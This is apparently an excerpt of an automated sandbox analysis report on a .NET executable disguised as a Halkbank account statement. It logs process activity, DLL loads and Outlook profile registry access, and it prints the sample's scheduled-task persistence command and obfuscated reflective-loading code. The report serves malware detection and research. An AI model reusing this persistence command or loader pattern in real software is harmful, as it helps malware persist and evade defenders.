Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Process created: C:\Users\user\AppData\Roaming\bAZAANr.exe "C:\Users\user\AppData\Roaming\bAZAANr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: hdNu.pdb source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr
Source:	Binary string: hdNu.pdbSHA2567 source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.39cbb88.0.raw.unpack, h1u0KhLk9tom65UQqU.cs	.Net Code: tFl6OmEZcm System.Reflection.Assembly.Load(byte[])
Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.7570000.4.raw.unpack, h1u0KhLk9tom65UQqU.cs	.Net Code: tFl6OmEZcm System.Reflection.Assembly.Load(byte[])

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: 0xC316BEF2 [Tue Sep 19 11:56:34 2073 UTC]

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D16190 pushfd ; retf	0_2_04D16196
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D10D8D push cs; retf	0_2_04D10DA6
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D110D0 push esi; retf	0_2_04D113DE
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D11076 push esp; retf	0_2_04D11086
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D191E8 push AD3404D2h; retf	0_2_04D191F6
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 0_2_04D113DF push esi; retf	0_2_04D113DE
